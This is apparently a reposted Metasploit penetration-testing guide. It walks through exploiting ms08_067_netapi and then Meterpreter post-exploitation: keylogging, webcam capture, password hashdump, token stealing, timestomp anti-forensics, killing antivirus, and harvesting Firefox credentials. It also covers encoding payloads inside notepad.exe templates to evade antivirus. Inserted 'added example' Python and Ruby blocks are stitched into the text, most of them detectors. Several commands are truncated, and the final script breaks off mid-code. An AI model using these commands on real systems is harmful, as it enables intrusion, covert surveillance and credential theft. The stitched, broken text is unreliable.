Metasploit Guide

Upload: bogne

Post on 07-Aug-2018

8/20/2019 Met as Ploit Guide

Metasploit Guide

Table of Contents

1. Introduction about Metasploit
2. Metasploit Basics
3. Information Gathering
4. Exploitation
5. Introduction about Meterpreter
6. Post Exploitation using Meterpreter
7. Metasploit Utilities
8. Meterpreter Scripting
9. Client Side Exploitation
10. Social Engineering Toolkit (SET)
11. Auxiliary modules
12. Linux exploitation

Attribution

1. http://www.offensive-security.com/metasploit-unleashed/Main_Page
2. http://www.securitytube.net/
3. http://www.metasploit.com/
4. http://en.wikipedia.org/
5. Various blogs and ethical hacking websites

Note: This document was solely made for educational purposes. Please do not use these methods for any kind of malicious activities or purposes (intentional or unintentional).

Chapter One

Introduction about Metasploit

Metasploit is an open source computer security project. Metasploit is not a single tool; it is a framework which is used for developing and executing exploit code against a remote target. Using Metasploit we can exploit most of the vulnerabilities that exist in a software.

Metasploit Architecture

Libraries

1. Rex: It is the basic library for performing most tasks. It handles sockets and different types of protocols.
2. MSF Core: It provides the basic API and defines the Metasploit framework.
3. MSF Base: It provides the friendly API, with simplified APIs for use in the framework.

Modules:

Payload: A payload is a piece of code that runs remotely on the target system.

Exploit: An exploit is a piece of software, a chunk of data or a sequence of code that takes advantage of a bug or vulnerability.

Auxiliary modules: These modules are used for scanning, fuzzing and doing various tasks.

Encoder: A program which encodes our payloads to avoid anti-virus detection.

Interfaces:

Metasploit has different interfaces to ease our tasks. We can do a variety of tasks with these interfaces.

1. MSFConsole: This is the main interface we use throughout this document. Open a terminal and type msfconsole. You will get a window like the screenshot below. Msfconsole eases all our tasks compared to the other interfaces. I will explain all the commands which we can use in the msfconsole interface in the Metasploit Basics chapter.

2. MSFCLI

This is the sample usage of the msfcli interface. msfcli gives more importance to scripting and interpretability. It runs directly from the command line. It is a fantastic tool when you know the exact exploit and payload.

Usage:

Open a terminal.

1. msfcli -h
2. msfcli windows/smb/ms08_067_netapi O (it displays the various options)
3. msfcli windows/smb/ms08_067_netapi R

3. Armitage

Armitage is the graphical (GUI) version of Metasploit. It was developed by Raphael Mudge. In Armitage we can open more than one terminal and search our exploits in either the GUI or the CUI at the same time.

Usage:

Open a terminal and type armitage.

It will display the window above. We can search our exploits using the attacks tab and search for the appropriate payloads for that exploit.

The Armitage window below displays the Metasploit CUI version and the one above the GUI version.

You can view video tutorials about Armitage at the link below.

http://www.fastandeasyhacking.com/manual

4. MSFGUI:

It is better to use msfconsole rather than the other interfaces because it gives more power to our pentesting tasks.

Metasploit Editions:

Metasploit provides a community edition free of cost to everyone; the remaining two editions cost more. The express and pro editions are used by giant security consulting firms, because those editions are too costly.

Chapter Two

Metasploit Basics

To become familiar with the Metasploit framework one should know the basic commands of Metasploit. Metasploit commands are classified into 2 types:

1. Core commands
2. Database commands

To open Metasploit, open a terminal and type msfconsole.

1. Core commands

To list these commands type ? or help in the Metasploit console. Now I will explain the important commands that will help in the exploitation.

Useful commands

1) back: To come back from the current exploit or module. You can see I am getting back from the exploit (ms10_002_aurora) to the msf main window.

2) banner: This command displays the Metasploit banner.

3) connect: This command is used to connect to a host. We should specify the host IP address and port number along with this command.

4) exit and quit: These commands are used to exit from Metasploit and return to the root shell.

5) irb: This command is used to drop into irb mode. Using this mode one can write one's own Ruby scripts.

6) info: This command displays the whole information about the selected exploit.

7) load: This command is used to load plugins into Metasploit.

8) unload: This command is used to unload a loaded plugin from the framework.

9) search: This command is used to search for a specific exploit or module. This command is very useful to search for any module.

10) resource: This command is used to run specific commands from a specified file. We should give the file path along with this command.

11) use: This command is used to select a specific exploit.

12) version: This command will display the current version of Metasploit. To update Metasploit type msfupdate in the console.

13) set and unset: These commands set variables. By using these commands we can set our payloads and we can set the IP address. Using unset we can unset the value and then give a new IP address.

14) setg and unsetg: These commands are used to set our variables globally throughout our pentesting.

15) show: This command is used to view the options or modules. It is a very useful command.

Database commands: Database commands are very useful to maintain huge data and export that data into files. We can share data among our pentesting team and collaborate on that data.

By default, Metasploit comes with a PostgreSQL database.

1) db_connect: This command is used to connect to the database. The format to use this command is db_connect username:password@hostname:port/database name. In my system my username and password are

db_connect msf3:4bfedfc2@localhost:7337/msf3dev

2) db_disconnect: To disconnect from the database.

5) db_import: To import the files from various softwares like Nessus and Nexpose.

6) db_export: To export our results to other softwares.

7) hosts: This command will display the connected hosts. You can use hosts -c to filter the columns.

8) db_nmap: Nmap is a very useful tool for pentesters and network engineers. We can do many tasks using the nmap tool.

eg: db_nmap -O 192.168.217.131. It displays the services and operating system info.

9) services: This command will display the list of all services running.

10) vulns: It will display the vulnerabilities existing in the victim system.

Chapter Three

Information gathering

"If I had eight hours to chop down a tree, I'd spend six hours sharpening my axe."

Abraham Lincoln

Information gathering is the first step in penetration testing. In this phase we gather as much information as possible about the target. The more information we have, the greater the chance of exploiting. In this phase we can gather information like IP address and services; if the target is a website then we should gather subdomains, emails, the hosting server and the location of the server.

There are 2 types of information gathering

1) Active information gathering
2) Passive information gathering

Passive information gathering: In this technique we are not directly interacting with the target. We will search for information using the whois and nslookup commands. There are many tools available in BackTrack to find the DNS information.

Nslookup: Using nslookup we will get the additional server information.

Whois: This command is used to gather the subdomains information and registrar name.

These are only a few techniques discussed. There are many more ways to gather information passively.

Active information gathering:

In active information gathering we will use the tool nmap (network mapper), written by Gordon "Fyodor" Lyon. It is a cross platform tool.

I will explain some basic nmap commands to scan our network. The book "Nmap Cookbook: The Fat-Free Guide to Network Scanning" is highly recommended to explore much more about Nmap.

To scan a single IP address: We can use Nmap to scan a single IP address.

usage: nmap <ip address>

To scan multiple IP addresses:

usage: nmap 192.168.217.131 192.168.217.133

To scan an entire subnet:

usage: nmap 192.168.217.131/24

Advanced scanning options:

Nmap has many advanced features to successfully gather more information about the target. We can scan TCP ports and UDP ports, and perform operating system and version detection.

We can perform a null scan, ACK scan and traceroute on the target. Nmap is like a Swiss army knife: we can handle a wide variety of security testing and network administrative tasks.

TCP SYN scan:

We can perform a SYN scan on the network. This scan is very stealthy. It does not open a full connection to the remote host.

usage: nmap -sS 192.168.217.131

UDP (User Datagram Protocol) scan: We can scan the UDP ports of the target system.

usage: nmap -sU 192.168.217.131

TCP Null scan:

Now we are performing a null scan to trick the firewalled system and to get a response from that system.

Usage: nmap -sN 192.168.217.131

Operating system and version detection

To find the operating system of the target we will use the -O option.

Usage: nmap -O 192.168.217.131

To find the version detection:

Using Nmap we can find the versions of the services running on the ports. We will use the -sV option to do this.

Usage: nmap -sV 192.168.217.131

You can combine both the -O and -sV options at a time.

usage: nmap -O -sV 192.168.217.131

These are some nmap commands to find the target services, open ports and operating system info. There are many other advanced options that exist in nmap. I highly recommend the book Nmap Cookbook to know more about nmap and explore the many options that exist in nmap.
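The SYN, UDP and null scans above are described from the scanning side. The Python below is an added example, not part of the original guide, showing how the same three scan types look to a defender: each source is judged by how many distinct ports it touches and by the TCP flags it sends (SYN only, no flags at all, or UDP with no flags). The packet summaries, the source addresses and the port threshold are constructed assumptions; only the target address is the guide's lab host.

```python
from collections import defaultdict

# Constructed packet summaries (assumption: a sensor or flow log reduced to
# (src, dst, proto, dst_port, tcp_flags); tcp_flags is a set of flag names,
# empty for UDP and for TCP segments with no flags set).
TARGET = "192.168.217.131"  # the lab host used in the scans above
SAMPLE_PACKETS = [
    # SYN scan: a single SYN to each of many ports, never followed by ACK
    *[("10.0.0.5", TARGET, "tcp", p, {"SYN"}) for p in range(20, 60)],
    # NULL scan: TCP segments carrying no flags at all
    *[("10.0.0.6", TARGET, "tcp", p, set()) for p in range(1, 30)],
    # UDP scan: datagrams sprayed across many UDP ports
    *[("10.0.0.7", TARGET, "udp", p, set()) for p in range(53, 90)],
    # ordinary client: completes the handshake with one service
    ("10.0.0.8", TARGET, "tcp", 445, {"SYN"}),
    ("10.0.0.8", TARGET, "tcp", 445, {"ACK"}),
    ("10.0.0.8", TARGET, "tcp", 445, {"PSH", "ACK"}),
]

PORT_THRESHOLD = 15  # assumed: distinct ports per source before we call it a scan


def classify_scans(packets, threshold=PORT_THRESHOLD):
    """Return {src: kind} for sources touching >= threshold distinct ports.

    kind is "tcp_syn", "tcp_null" or "udp". A TCP source that ever sends ACK
    is treated as a real client and is not flagged, which keeps a busy but
    legitimate host out of the result.
    """
    ports = defaultdict(set)                   # (src, proto) -> distinct dst ports
    saw_ack = defaultdict(bool)                # src -> some TCP segment carried ACK
    flagless_only = defaultdict(lambda: True)  # src -> every TCP segment had no flags

    for src, _dst, proto, port, flags in packets:
        ports[(src, proto)].add(port)
        if proto == "tcp":
            if "ACK" in flags:
                saw_ack[src] = True
            if flags:
                flagless_only[src] = False

    findings = {}
    for (src, proto), touched in ports.items():
        if len(touched) < threshold:
            continue
        if proto == "udp":
            findings[src] = "udp"
        elif not saw_ack[src]:
            findings[src] = "tcp_null" if flagless_only[src] else "tcp_syn"
    return findings


if __name__ == "__main__":
    for src, kind in sorted(classify_scans(SAMPLE_PACKETS).items()):
        print(f"{src}: {kind} scan against {TARGET}")
```

The null scan stands out because a flagless TCP segment never occurs in normal traffic, so even a low port count is suspicious for it; the SYN scan is separated from a legitimate client only by the absence of any ACK, which is why the threshold should be tuned per network.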

Chapter Four

Exploitation

Exploitation is the meridian for every security engineer. It is a great feeling to exploit a first machine and get full control over that machine. Exploitation is a very difficult task to accomplish. We need to know much about the target. In this chapter I will show you advanced techniques to get a shell on the target system and you will gain full control over the victim system.

Before reading this chapter please read chapter two to know the basics of Metasploit. I am going to use the msfconsole throughout this chapter.

Basic exploitation:

I am going to use the ms08_067_netapi exploit. You can get much information about this exploit at the link below.

http://www.metasploit.com/modules/exploit/windows/smb/ms08_067_netapi

Metasploit has a great feature, tab completion. If we don't know about a particular exploit, press tab twice to get some suggestions displayed. You can see it displays various exploits. Or you can search for a particular exploit using the search command.

Search netapi:

Usage: search <exploit name>

show: The show command is used to view the various exploits, payloads and encoders.

Usage: show exploits, show payloads, show encoders.

Steps to exploit our first Windows machine.

Step 1: use exploit/windows/smb/ms08_067_netapi.

Step 2: show options to view the various options.

R

Step 3: set R

Setting a Payload:

Usage: set payload windows/shell/bind_tcp

Step 5: To get the shell on the target computer, use the command exploit. This command runs the payload against the target system. Then you will get a remote shell on the target system.

Usage: exploit

For confirmation, you can check the IP address of the remote system just by typing ipconfig.

Congratulations! You have exploited your first Windows machine. Now you can create your own folders and run files remotely on the target system. To give more power to exploitation we will use the meterpreter payload. I will discuss this payload later.

Commands used in this chapter

1) use exploit/windows/smb/ms08_067_netapi: To select a particular exploit
2) show options: To view the options
3) set R

Chapter Five

Introduction about Meterpreter

Meterpreter is the forerunner product in the Metasploit framework which is leveraged as a payload after exploitation. Meterpreter is used to enhance post exploitation.

Features:

It does not create a new process and completely resides in memory. So there is no chance of detection. It does not write any data on the disk. All the communication from the attacker to the victim is completely encrypted. It creates a separate channel to encrypt the data.

Meterpreter has huge options to ease our post exploitation. We can gain full control over the victim system.

Exploitation using meterpreter:

In this we follow the same procedure as the above exploitation, except for the payload.

Step 3: Setting meterpreter as the payload.

Usage: set payload windows/meterpreter/bind_tcp

Step 4: run the exploit command.

Chapter Six

Post Exploitation using Meterpreter

We can significantly improve post exploitation using meterpreter. Many of us think getting a shell on the target system is the important task, but controlling our target system is very important. We can control our target extensively by using meterpreter. Meterpreter is the extension to the Metasploit framework that allows us to leverage Metasploit's functionality and further compromise our target.

We can do many amazing tasks using the meterpreter payload like webcam snapshots, dumping hashes, monitoring keystrokes, downloading files from the target, uploading files into the target and many more. You can see all those tasks in this chapter.

First, we have to compromise our target using meterpreter, then we will get a meterpreter shell. Follow the procedure in the above chapter "Introduction to Meterpreter" to exploit the target. Meterpreter has a very huge command list; I will try to cover 95% of the commands in this chapter. Practice all the commands which I discuss in this chapter to become comfortable with Meterpreter.

Meterpreter commands are divided into many sections depending upon their usage. I will discuss all the commands not in the same order, but in a random order, depending upon the task.

1. Core commands
2. Stdapi: System commands
3. Stdapi: File system commands
4. Stdapi: User interface commands
5. Stdapi: Networking commands
6. priv commands

Some of these commands are self explanatory; you can easily understand those commands by reading the description. I will leave those commands as an exercise to you. I highly recommend you read the book "Introduction to the Command Line (Second Edition): The Fat Free Guide to Unix and Linux Commands" to become familiar with the Linux operating system. This book gives you a good knowledge of Linux commands and how to use them efficiently.

1) Core commands:

2) System commands:

3) File system commands:

4) User interface and webcam commands

5) Networking commands:

6) Priv commands

1) Core commands: Core commands are basic meterpreter commands.

1) background: This command is used to background a meterpreter session, and we will come back to the exploit module.

To view the available sessions: sessions -l

To interact with a session we have to use sessions -i <session id>, eg: sessions -i 1

2) bgrun: This command is used to execute a meterpreter script as a background process.

3) info: It gives the description about the selected post exploitation module.

Usage: info <module name>

4) migrate: It migrates to another process. We have to migrate to another process because the victim might close the process which meterpreter is bound to. So we have to migrate to system processes.

Usage: migrate <process id>

eg: migrate 12212

5) use: This command is used to load a particular extension into the framework. It is like the load command in Metasploit.

Usage: use espia

6) run: This command is used to run a meterpreter script.

Usage: run <script name>

eg: run checkvm

7) irb: This command is used to drop into a Ruby shell where we can create Ruby based scripts.

8) Channel commands: Channels are very useful to execute our commands on the target system. The communication in the channels is encrypted. We can read, write and interact with the channels.

To create a channel we have to use the execute command.

Usage: execute -f explorer.exe -c

channel -l: To view the list of channels.

channel -w: To write data into a particular channel we will use this command.

Usage: channel -w 2 (where 2 is the channel number)

channel -r: To read data from a particular channel.

Usage: channel -r 2

interact: This command is used to interact with a particular channel.

Usage: interact 2

File system commands:

1) pwd: It displays the present working directory, and the cd command is used to change the directory.

2) ls: To list the files in a directory.

3) cat: This command is used to read the contents of a file. In ls you can find two files, namely credit card and email password. I intentionally created them to demonstrate how awful it is to save confidential information without encrypting it.

So do not save your confidential information into text files and do not write passwords anywhere. If you want to write them down, then encrypt those files. TrueCrypt is a good software to encrypt any kind of file.

4) download: You can also download those files using this command.

Usage: download <file path>

eg: download c:\\creditcard.txt

5) upload: You can upload your backdoors into the target system.

Usage: upload <source> <destination>

eg: upload /root/payload.exe c:\\

search: This command is used to search for files in a folder or drive. We can also specify the type of file to search, eg. doc, txt, pdf.

Usage: search -d c:\\ -f *.txt -r

mkdir, rmdir: To make a directory we use the mkdir command. To remove a directory we use the rmdir command.

Usage: mkdir kaleem

Usage: rmdir kaleem

Networking commands:

1) arp: To display the host ARP cache and host information.

2) ipconfig: It is used to display the remote host IP address.

netstat: It is used to display the network statistics.

route: It is used to display the routing table information. This command is very useful in the pivoting concept.

Usage: route -h

System commands:

sysinfo: This command is used to view the target system information.

ps: This command is used to display the processes running in the target system.

getpid: This command is used to view the current process.

getuid: This command is used to view the current user.

reboot: This command is used to reboot the target system.

shutdown: This command is used to shut down the remote system.

shell: This command is used to drop a shell on the remote system.

Token impersonation:

Token impersonation is a very important concept in meterpreter. Windows tokens are just like web cookies. They are like temporary keys which hold an object's security information for the entire login, so that users do not have to provide their credentials each time they access a file or an object. There are two types of tokens available

1) Delegation token
2) Impersonate token

1) Delegation token: Delegation tokens are used for interactive logins such as logging into your Windows machine and connecting to remote desktop.

2) Impersonate token: Impersonate tokens are used for non-interactive logins like connecting to a network drive.

Tokens can be available to us until reboot. When the user logs off from the system, the delegation token becomes an impersonate token but it has all the rights just like the delegation token.

We will use the incognito extension to steal and impersonate Windows tokens. You can find much more about tokens in the PDF link below.

http://labs.mwrinfosecurity.com/assets/142/mwri_security-implications-of-windows-access-tokens_2008-04-14.pdf

First we have to load the incognito extension into our meterpreter.

Usage: use incognito

To view the available tokens you can use the command below.

Usage: list_tokens -u

You can see 4 delegation tokens and 1 impersonate token are available. Quickly check who we are using the getuid command.

Usage: getuid

Now I am logged in as NT AUT

Impersonate:

You can see in the delegation tokens that the KALEEM27A12BDC\ADMINISTRATOR token is available. Now I am going to impersonate that user.

Usage: impersonate_token <token name>

eg: impersonate_token KALEEM27A12BDC\\ADMINISTRATOR

You can see I impersonated KALEEM. You can see the user ID using the getuid command.

Steal token:

You can steal a token from other users.

Usage: steal_token <process id>

eg: steal_token 1234

Drop token:

You can drop the token to get back. You can see in the picture below, first I impersonated kaleem and then I used the drop_token command to get back to NT AUT

rev2self:

This command is also used to get back to the old user.

Usage: rev2self

getprivs: This command is used to get all the available privileges on the victim machine.

User interface and webcam commands:

idletime: This is used to view how long our victim has been away from the system, meaning he does not interact with the keyboard or mouse.

Keylogging:

All of us are ever curious about what the victim is typing on his system and how to record all those keystrokes. Metasploit developers have done a great job writing an in-built keylogger. We can monitor all the keystrokes typed by our victim.

There are 3 commands available in meterpreter.

keyscan_start: To start a keylogger on the victim machine.

keyscan_dump: To dump all the keystrokes typed by our victim.

keyscan_stop: To stop the keylogger on the victim's system.

I performed all these commands on my victim machine (Windows XP). You can view them in the picture below.

It can even record the alt, ctrl and shift keys. It is a very powerful command.

uictl: This command is used to control the victim's keyboard and mouse. We can disable their keyboard or mouse remotely.

Usage: uictl enable/disable keyboard/mouse

Screenshot:

We can grab screenshots of our victim's machine. We can view what the victim is viewing. You can see my Windows machine desktop here.

Usage: screenshot

Webcam commands:

Another interesting set of commands are the webcam commands. You can view the victim remotely. I do not have a webcam in my laptop (I am using a pretty old one). You can try this command on your system.

There are two commands available.

1) webcam_list: To view the list of webcams.

Usage: webcam_list

2) webcam_snap: To take a snapshot of your victim.

Usage: webcam_snap

I have got an error because I do not have a webcam on my laptop. It will work if you have one on yours.

Priv commands:

These commands are used to escalate privileges and to get all the available privileges on the victim machine.

getsystem: This command is used to get privileges on the victim system.

Usage: getsystem

hashdump: This command is used to dump all the hashed passwords from the victim system.

You can crack the hashed passwords using the psexec exploit or jtr_crack_fast.

timestomp (anti forensic tool):

When we are conducting a pentest on the victim's system, we may access their filesystem. If there is any forensic investigation, they will easily detect that the system has been compromised. The best way to avoid forensic detection is not to access our victim's file system. So we will use meterpreter. It completely resides in memory and does not write any data on the disk.

Set the modification time of a file:

We can set the modification time of a file. To do this use the -m option.

Usage: timestomp <path of the file> -m "MM/DD/YYYY"

To display MAC attributes:

Use the -v option to display all the attributes.

Usage: timestomp <path of the file> -v

Eg: timestomp c:\\creditcard.txt -v

To set existing file attributes:

We can copy an already existing file's attributes onto our specified file. To do this use the -f option. In the example below I applied the ntldr file attributes to my file.

Usage: timestomp <path of your file> -f <path of existing file>

Eg: timestomp c:\\creditcard.txt -f c:\\ntldr
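The two timestomp uses above, setting a bare date with -m and copying another file's times with -f, both leave traces an examiner can look for. The Python below is an added example, not from the original guide: it checks file records for a zero sub-second part (the -m form takes whole seconds, while Windows normally stores fractional timestamps), for a modified time earlier than creation, and for timestamps identical to a known system file such as the ntldr used above. The file records, the reference file's timestamps and the helper names are constructed assumptions.

```python
from datetime import datetime, timezone


def utc(y, mo, d, h=0, mi=0, s=0, us=0):
    """Build a UTC timestamp; microseconds stand in for NTFS's 100 ns ticks."""
    return datetime(y, mo, d, h, mi, s, us, tzinfo=timezone.utc)


# Constructed reference: (modified, accessed, created) of a well-known OS file.
# In a real examination these would be read from the volume under review.
SYSTEM_REFERENCE = {
    r"c:\ntldr": (utc(2004, 8, 4, 12, 0, 0, 123456),
                  utc(2009, 1, 2, 8, 15, 30, 654321),
                  utc(2004, 8, 4, 12, 0, 0, 123456)),
}

# Constructed file records: (path, modified, accessed, created).
SAMPLE_FILES = [
    # ordinary document: fractional seconds present, created before modified
    (r"c:\docs\report.docx",
     utc(2009, 3, 1, 9, 12, 5, 887001),
     utc(2009, 3, 2, 10, 0, 0, 12345),
     utc(2009, 2, 28, 14, 3, 9, 445566)),
    # after "timestomp ... -m": modified is a bare date, zero fraction, before creation
    (r"c:\creditcard.txt",
     utc(2005, 1, 1),
     utc(2009, 3, 2, 10, 0, 0, 12345),
     utc(2009, 3, 1, 14, 3, 9, 445566)),
    # after "timestomp ... -f c:\ntldr": an exact copy of the reference file's times
    (r"c:\email_password.txt", *SYSTEM_REFERENCE[r"c:\ntldr"]),
]


def timestomp_indicators(record, reference=SYSTEM_REFERENCE):
    """Return the reasons a record looks timestomped (empty list if none)."""
    path, modified, accessed, created = record
    reasons = []
    # -m/-a/-c take whole seconds, so the fractional part is left at zero,
    # whereas Windows normally records sub-second precision.
    if any(t.microsecond == 0 for t in (modified, accessed, created)):
        reasons.append("zero sub-second timestamp")
    # A file cannot legitimately be modified before it was created.
    if modified < created:
        reasons.append("modified before created")
    # -f copies another file's times exactly; a user file matching a system
    # file to the tick is a strong hint.
    for ref_path, ref_times in reference.items():
        if path.lower() != ref_path.lower() and (modified, accessed, created) == ref_times:
            reasons.append("timestamps identical to " + ref_path)
    return reasons


def scan(records, reference=SYSTEM_REFERENCE):
    """Map each suspicious path to its list of indicators."""
    findings = {}
    for rec in records:
        reasons = timestomp_indicators(rec, reference)
        if reasons:
            findings[rec[0]] = reasons
    return findings


if __name__ == "__main__":
    for path, reasons in scan(SAMPLE_FILES).items():
        print(path, "->", "; ".join(reasons))
```

Treat each hit as a lead rather than proof: FAT volumes and some archivers also produce whole-second timestamps, so a zero fraction on its own is weak, and the copied-timestamp check only works for reference files whose times are known. On NTFS the stronger confirmation is comparing the $STANDARD_INFORMATION times that timestomp rewrites against the $FILE_NAME times it does not touch.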

Chapter Seven

Metasploit Utilities

Metasploit comes with two utilities to generate shellcode and to evade anti-virus detection. Using these utilities we can do the exploitation stealthily.

There are two types of utilities

1. msfpayload
2. msfencode

1. msfpayload:

Using msfpayload we can generate shellcode executables, and we can use that shellcode outside the framework. We can generate the payload according to our format. We can create C, Ruby, JavaScript, exe and many other types of formats.

Step 1:

Usage: msfpayload -h

Step 2: To view the various options to fill.

Usage: msfpayload windows/meterpreter/reverse_tcp O

Step 3

msfpayload windows/meterpreter/reverse_tcp L

msfencode:

The payload which we have generated using msfpayload is fully functional, and if the victim scans with the help of an antivirus, it could be detected. Antivirus softwares look for signatures to scan, so the shellcode is detected by the antivirus.

To evade this, Metasploit developers have done a great job introducing a new utility called msfencode. Using this we can encode our shellcode with various encoders to bypass antivirus detection.

Usage: msfencode -h

There are different kinds of options available to use.

Important options

-c means count, how many times we are encoding. eg: -c 5 means I am encoding 5 times.

-e Name of the encoder we use. eg: -e x86/alpha_upper

-o Give the output file name. eg: -o payload.exe

-t Type of format. eg: -t raw

-x Option to give an alternative template. Eg: -x notepad.exe

-k The given template opens and our payload runs in a new process. Eg: -x notepad.exe -k

The victim is shown notepad when he opens the file, but the payload runs stealthily in the background.

List of msfencoders:

Usage: msfencode -l

This is a list of the available encoders. We can encode our payload using any of the above encoders to evade antivirus detection.

A very good encoder is shikata_ga_nai; it is a polymorphic encoder.
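Encoders such as shikata_ga_nai defeat signature matching by scrambling the payload body, but the scrambled bytes look close to uniformly random, which is itself measurable. The Python below is an added example, not part of the original guide, showing the complementary defender check: Shannon entropy per fixed-size window over a file, flagging windows that approach the 8 bits per byte of random data. The sample buffer (text, zero padding, then a seeded pseudo-random region standing in for an encoded payload), the window size and the threshold are constructed assumptions.

```python
import math
import random


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty/constant input, 8.0 for uniform."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def high_entropy_windows(data: bytes, window: int = 512, threshold: float = 7.0):
    """Return [(offset, entropy)] for each fixed-size window above the threshold.

    A trailing window shorter than half the window size is skipped because
    the entropy estimate on very few bytes is unreliable.
    """
    hits = []
    for off in range(0, len(data), window):
        chunk = data[off:off + window]
        if len(chunk) < window // 2:
            continue
        e = shannon_entropy(chunk)
        if e > threshold:
            hits.append((off, round(e, 2)))
    return hits


# Constructed sample "file" (an assumption, not a real binary): readable text,
# a zero-filled run, then a scrambled region standing in for an encoded payload.
_rng = random.Random(1)  # fixed seed so the example is reproducible
TEXT = (b"This program cannot be run in DOS mode.\r\n" * 30)[:1024]
PADDING = b"\x00" * 512
SCRAMBLED = bytes(_rng.getrandbits(8) for _ in range(1024))
SAMPLE_FILE = TEXT + PADDING + SCRAMBLED


def scan_sample():
    """Offsets of the windows flagged in the constructed sample."""
    return [off for off, _ in high_entropy_windows(SAMPLE_FILE)]


if __name__ == "__main__":
    for off, e in high_entropy_windows(SAMPLE_FILE):
        print(f"offset 0x{off:04x}: entropy {e} bits/byte (possible encoded or packed region)")
```

Only the two scrambled windows at offsets 1536 and 2048 exceed the threshold; the text windows sit near 4 bits per byte and the zero padding at 0. Compressed or encrypted resources are legitimately high-entropy too, so this is a triage signal that narrows where to look, not a verdict on its own.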

Step 3: Encoding with msfencode

Usage: msfpayload windows/meterpreter/reverse_tcp L

Multi encoding with msfencode

Step 4:

Usage: msfpayload windows/meterpreter/reverse_tcp L

Encoding with custom executable templates

Step 5: msfpayload windows/meterpreter/reverse_tcp L

Chapter Eight

Meterpreter scripting

Meterpreter has many inbuilt scripts to complete our difficult tasks using just a simple script. We can create our own scripts using the Ruby language and run those scripts after exploitation.

You can see sample scripts in the picture above. There are more than 200 scripts available in Metasploit to do our post exploitation. Now I will discuss some important scripts.

1. checkvm
2. credcollect
3. keylogrecorder
4. vnc
5. webcam
6. getcountermeasure
7. killav
8. scraper
9. enum_firefox
10. file_collector
11. arp_scanner
12. gettelnet
13. hostsedit

To execute a particular script you should use the run command along with that script name.

Usage: run checkvm

1) checkvm: This script is used to check whether the target is running on a virtual machine or not.

2) credcollect: This script is used to collect the hacked passwords.

Usage: run credcollect

3) keylogrecorder: This script will record all keystrokes typed on the victim system.


    4) vnc: This is a very useful script. It uploads a VNC server to the target and opens a remote desktop (VNC) session to it. You can see my Windows system here.

    Usage: run vnc

    5) webcam: This script switches on the webcam on the remote machine so that we can view it remotely.

    Usage: run webcam

    6) getcountermeasure: This script enumerates the security products on the victim machine: antivirus, HIPS, third-party firewalls, DEP configuration and the Windows firewall configuration. With its -k option it kills the processes of the products it detects, and with -d it disables the built-in Windows firewall. It does not silently bypass them: killing security software is noisy (usually logged and noticed), so think before using those options.


    7) killav: This script kills the antivirus processes on the victim system (again noisy, and it only works with sufficient privileges).

    Usage: run killav

    8) scraper: This script is very handy. It collects the system information (users, shares, network configuration, services and so on) and exports the registry, downloading everything to the attacker's machine.

    Usage: run scraper


    9) enum_firefox: This script gathers the stored passwords, cookies, history and bookmarks from the Firefox browser on the victim's system.

    Usage: run enum_firefox

    10) file_collector: This script is used to find and download existing files on the target system. We can collect doc, pdf and text files using this script.

    I used many options to search for files; you can see the various options with the -h option:

    -d  directory to start the search in (add -r to search subdirectories)
    -f  file type pattern(s) to match, separated by |, e.g. -f "*.doc|*.pdf|*.txt"
    -o  output file for the list of found files, -i input file listing the files to download, -l local directory to save the downloads in


    11) gettelnet: This script enables the Telnet service on the remote PC (and can create a user for it with -u and -p).

    Usage: run gettelnet

    12) arp_scanner: This script performs an ARP sweep of a given IP range from the compromised host, so we can discover the other live hosts on the victim's local network before pivoting to them. It does not itself set up the pivot or the port forward; that is done with route add and portfwd.

    Usage: run arp_scanner -r 192.168.1.0/24

    13) hostsedit: This script edits the hosts file on the remote system, for example to redirect a hostname to an attacker-controlled address (-e IP,hostname).
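As an added example (not the guide's text and not Metasploit's own checkvm code), here is the core of a checkvm-like detection written in plain Ruby: it classifies network interfaces by the vendor prefix (OUI) of their MAC address and looks for the guest-tools processes of common hypervisors. The interface and process lists are constructed sample data. The guarded branch at the end sketches how the same logic would be wired into a real Meterpreter script; the API names there (client.net.config.interfaces, Interface#mac_addr and #mac_name, client.sys.process.get_processes) are my reading of the Meterpreter Ruby API and should be checked against your Metasploit version.

```ruby
# Added example: a checkvm-style virtual machine check in plain Ruby.
# The real checkvm script also inspects registry keys and services; this
# shows the two cheapest signals, MAC OUI and guest-tools process names.

# IEEE OUI prefixes assigned to hypervisor vendors for virtual NICs.
VM_OUIS = {
  "00:05:69" => "VMware", "00:0C:29" => "VMware", "00:1C:14" => "VMware", "00:50:56" => "VMware",
  "08:00:27" => "VirtualBox",
  "00:16:3E" => "Xen",
  "00:15:5D" => "Hyper-V",
  "00:1C:42" => "Parallels",
  "52:54:00" => "QEMU/KVM",
}.freeze

# Guest additions / tools processes that only exist inside a VM.
VM_PROCESSES = {
  "vmtoolsd.exe" => "VMware", "vmwaretray.exe" => "VMware", "vmwareuser.exe" => "VMware",
  "vboxservice.exe" => "VirtualBox", "vboxtray.exe" => "VirtualBox",
}.freeze

# Accepts "00:0c:29:..." / "00-0C-29-..." text or the 6 raw bytes that
# Meterpreter returns for a MAC, and yields the upper-case colon form.
def normalize_mac(mac)
  if mac =~ /\A\h{2}([:-]\h{2}){5}\z/
    mac.upcase.tr("-", ":")
  elsif mac.bytesize == 6
    mac.unpack("C6").map { |b| format("%02X", b) }.join(":")
  else
    raise ArgumentError, "unrecognised MAC #{mac.inspect}"
  end
end

# Vendor name for the interface's OUI, or nil for a physical NIC.
def vm_from_mac(mac)
  VM_OUIS[normalize_mac(mac)[0, 8]]
end

# Vendors implied by the running process names (case-insensitive).
def vm_from_processes(names)
  names.map { |n| VM_PROCESSES[n.downcase] }.compact.uniq
end

# interfaces: [{ name:, mac: }, ...]; processes: ["explorer.exe", ...]
# Returns the list of hypervisor vendors found, or nil on bare metal.
def check_vm(interfaces, processes)
  vendors = interfaces.map { |i| vm_from_mac(i[:mac]) }.compact.uniq
  vendors |= vm_from_processes(processes)
  vendors.empty? ? nil : vendors
end

# Constructed sample data standing in for a compromised Windows guest.
SAMPLE_INTERFACES = [
  { name: "Local Area Connection", mac: "00:0c:29:4f:8e:21" },
  { name: "Loopback", mac: "00:00:00:00:00:00" },
].freeze
SAMPLE_PROCESSES = %w[System smss.exe explorer.exe vmtoolsd.exe].freeze

if defined?(client) && client.respond_to?(:net)
  # Running as a Meterpreter script (saved under scripts/meterpreter/ and
  # started with `run <name>`): pull live data instead of the sample.
  # Attribute names below are assumed; verify them in your Metasploit version.
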